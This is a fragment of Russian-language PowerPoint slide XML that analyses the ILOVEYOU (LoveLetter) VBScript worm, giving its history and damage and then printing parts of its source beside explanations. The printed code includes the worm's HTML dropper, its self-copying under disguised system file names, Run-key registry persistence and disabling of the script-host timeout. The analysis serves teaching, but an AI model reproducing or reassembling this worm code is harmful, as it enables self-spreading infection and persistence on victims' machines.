              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Первыми от червя пострадали страны Азии, поскольку вирус был выпушен на Филиппинах. Затем он пришел в Европу и Америку. По оценкам различных компаний, поражению подверглось огромное количество компьютерных сетей (в отдельных странах - от 30 до 80 процентов). Количество получателей "любовных писем" оценивается в 45 миллионов человек, общие убытки - до 10 миллиардов долларов США.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Между тем победное шествие вируса по миру продолжается. Хотя многие антивирусные компании сразу же выпустили вакцины от "I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>love</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>", червь начал так же быстро </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>мутировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>. Модифицировать его код очень легко, поскольку он написан на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт-языке</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Visual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1900" dirty="0" smtClean="0"/>
              <a:t>, то есть распространяется в исходных текстах.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Процедура создания </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>HTM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>страницы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sub html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On Error Resume Next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lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 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dta1="&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;LOVELETTER - HTML&lt;?-?TITLE&gt;&lt;META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@&gt;"&amp;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"&lt;META NAME=@-@Author@-@ CONTENT=@-@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spyder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?-? ispyder@mail.com ?-? @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GRAMMERSoft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Group ?-? Manila, Philippines ?-? March 2000@-@&gt;"&amp;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"&lt;META NAME=@-@Description@-@ CONTENT=@-@simple but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think this is good...@-@&gt;"&amp;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"&lt;?-?HEAD&gt;&lt;BODY ONMOUSEOUT=@-@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window.name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=#-#main#-#;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window.open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(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&amp;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"ONKEYDOWN=@-@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window.name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=#-#main#-#;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window.open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(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@&gt;"&amp;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"&lt;CENTER&gt;&lt;p&gt;This HTML file need ActiveX Control&lt;?-?p&gt;&lt;p&gt;To Enable to read this HTML file&lt;BR&gt;- Please press #-#YES#-# button to Enable ActiveX&lt;?-?p&gt;"&amp;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"&lt;?-?CENTER&gt;&lt;MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@&gt;----------z--------------------z----------&lt;?-?MARQUEE&gt; "&amp;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"&lt;?-?BODY&gt;&lt;?-?HTML&gt;"&amp;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09764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"&lt;SCRIPT language=@-@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JScript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@-@&gt;"&amp;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"&lt;!--?-??-?"&amp;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window.screen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screen.availWidth;var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hi=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screen.availHeight;window.moveTo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(0,0);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window.resizeTo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wi,hi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);}"&amp;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"?-??-?--&gt;"&amp;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"&lt;?-?SCRIPT&gt;"&amp;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"&lt;SCRIPT LANGUAGE=@-@VBScript@-@&gt;"&amp;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"&lt;!--"&amp;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"on error resume next"&amp;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"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&amp;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"aw=1"&amp;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"code="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dta2="set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fso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(@-@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Scripting.FileSystemObject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@-@)"&amp;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"set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dirsystem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fso.GetSpecialFolder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(1)"&amp;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"code2=replace(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code,chr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(91)&amp;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(45)&amp;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(91),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(39))"&amp;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"code3=replace(code2,chr(93)&amp;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(45)&amp;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(93),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(34))"&amp;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"code4=replace(code3,chr(37)&amp;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(45)&amp;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(37),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(92))"&amp;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"set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wri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fso.CreateTextFile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dirsystem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&amp;@-@^-^MSKernel32.vbs@-@)"&amp;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wri.write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code4"&amp;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wri.close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fso.FileExists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dirsystem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&amp;@-@^-^MSKernel32.vbs@-@)) then"&amp;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err.number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=424) then"&amp;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"aw=0"&amp;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"end if"&amp;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"if (aw=1) then"&amp;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@-@ERROR: can#-#t initialize ActiveX@-@"&amp;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window.close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"end if"&amp;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"end if"&amp;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"Set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regedit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(@-@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WScript.Shell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@-@)"&amp;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regedit.RegWrite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@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^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CurrentVersion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^-^Run^-^MSKernel32@-@,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dirsystem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&amp;@-@^-^MSKernel32.vbs@-@"&amp;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"?-??-?--&gt;"&amp;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 _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"&lt;?-?SCRIPT&gt;"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dt1=replace(dta1,chr(35)&amp;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(45)&amp;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(35),"'")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dt1=replace(dt1,chr(64)&amp;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(45)&amp;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(64),"""")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dt4=replace(dt1,chr(63)&amp;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(45)&amp;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(63),"/")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dt5=replace(dt4,chr(94)&amp;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(45)&amp;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(94),"\")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dt2=replace(dta2,chr(35)&amp;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(45)&amp;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(35),"'")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dt2=replace(dt2,chr(64)&amp;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(45)&amp;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(64),"""")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dt3=replace(dt2,chr(63)&amp;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(45)&amp;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(63),"/")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dt6=replace(dt3,chr(94)&amp;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(45)&amp;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(94),"\")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50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fso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Scripting.FileSystemObject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c=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fso.OpenTextFile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(WScript.ScriptFullName,1)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lines=Split(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c.ReadAll,vbcrlf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l1=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ubound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(lines)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for n=0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ubound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(lines)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lines(n)=replace(lines(n),"'",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(91)+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(45)+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(91))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lines(n)=replace(lines(n),"""",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(93)+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(45)+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(93))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lines(n)=replace(lines(n),"\",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(37)+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(45)+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(37))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if (l1=n) then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lines(n)=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(34)+lines(n)+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(34)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lines(n)=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(34)+lines(n)+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(34)&amp;"&amp;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 _"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if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next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b=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fso.CreateTextFile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dirsystem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+"\LOVE-LETTER-FOR-YOU.HTM")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b.close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d=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fso.OpenTextFile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dirsystem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+"\LOVE-LETTER-FOR-YOU.HTM",2)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d.write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dt5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d.write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join(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lines,vbcrlf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d.write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vbcrlf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d.write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dt6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close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sub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Исходный код вируса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7"/>
            <a:ext cx="4038600" cy="4819664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="578358" indent="-514350">
              <a:buNone/>
            </a:pP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rem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barok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loveletter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vbe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) &lt;</a:t>
            </a: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 hate go to school&gt;	</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="578358" indent="-514350">
              <a:buNone/>
            </a:pP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rem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 	by: </a:t>
            </a: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spyder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  /  ispyder@mail.com  /  @</a:t>
            </a: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GRAMMERSoft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 Group  /  </a:t>
            </a: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Manila,Philippines</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="578358" indent="-514350">
              <a:buNone/>
            </a:pP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On Error Resume Next</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6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fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6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=""</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6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ctr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=0</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6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6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fso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Scripting.FileSystemObject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ru-RU" sz="6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6000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et file = </a:t>
            </a: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fso.OpenTextFile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(WScript.ScriptFullname,1)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="578358" indent="-514350">
              <a:buNone/>
            </a:pP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vbscopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6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ru-RU" sz="60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6000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ReadAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6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578358" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6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ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr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sub main()</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="6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61"/>
            <a:ext cx="4038600" cy="4962540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Копирайты</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> автора вируса, на основании которых сделан вывод о филиппинском происхождении вируса.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" err="1" smtClean="0"/>
              <a:t>Застараховываем</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0"/>
              <a:t> себя от непредвиденных ошибок.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Объявляем переменные.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Подготавливается окружение для работы вируса .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Читается основной файл вируса .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="6000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Запускается главная процедура .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-350838">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU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85795"/>
            <a:ext cx="4038600" cy="54626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On Error Resume Next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wscr,rr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wscr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WScript.Shell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wscr.RegRead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("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")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rr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&gt;=1)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wscr.RegWrite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"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"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if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85795"/>
            <a:ext cx="4038600" cy="546260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Вирус анализирует наличие запрета на обработку </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>скриптов</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0"/>
              <a:t> в системном реестре.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Если запрет установлен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" dirty="0" smtClean="0"/>
              <a:t>то изменением ключа в реестре она разрешается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326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Главная процедура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5"/>
            <a:ext cx="4038600" cy="47482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dirwin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fso.GetSpecialFolder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(0)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dirsystem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fso.GetSpecialFolder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(1)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dirtemp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fso.GetSpecialFolder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 c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fso.GetFile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WScript.ScriptFullName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c.Copy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dirsystem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&amp;"\MSKernel32.vbs");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c.Copy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dirwin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&amp;"\Win32DLL.vbs");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c.Copy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dirsystem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&amp;"\LOVE-LETTER-FOR-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YOU.TXT.vbs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regruns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html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spreadtoemail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listadriv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();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end sub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737"/>
            <a:ext cx="4038600" cy="4819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dirty="0" smtClean="0"/>
              <a:t>Определяются пути к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>каталогу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> WIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>; каталогу </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1500" dirty="0" smtClean="0"/>
              <a:t>SYSTEM;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>	каталогу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> TEMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Определяется имя активного файла</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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В каталог</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>копируется копия вируса под именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>MSKernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>32.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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В каталог</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> WIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>копируется копия вируса</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>под именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Win</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>32.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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В каталог</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>копируется вторая копия вируса под именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>LOVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>LETTER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>FOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>YOU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Запускается процедура работы с реестром </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Запускается процедура работы с </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> файлами</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Запускается процедура работы с электронной почтой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Запускается процедура деструктивных действий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="15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Процедура работы с реестром </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>WINDOWS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4038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sub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regruns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On Error Resume Next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num,downread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regcreate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"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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CurrentVersion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\Run\MSKernel32",dirsystem&amp;"\MSKernel32.vbs"	  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regcreate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"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\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CurrentVersion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RunServices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\Win32DLL",dirwin&amp;"\Win32DLL.vbs" </a:t>
            </a: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downread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=""	</a:t>
            </a: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downread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regget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("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")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downread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="")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GB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downread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:\“</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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if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Создается ключ в реестре, который будет запускать вирус при загрузке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>WINDOWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Анализируется расположение каталога </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Download Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> и если он не является корневым каталогом диска </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" sz="1500" dirty="0" smtClean="0"/>
              <a:t>С</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> , то переназначается на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .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Это делается для того, чтобы в дальнейшем принятый файл </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>WIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>BUGSFIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>EXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500" dirty="0" smtClean="0"/>
              <a:t> был расположен в корневом каталоге С:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1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9"/>
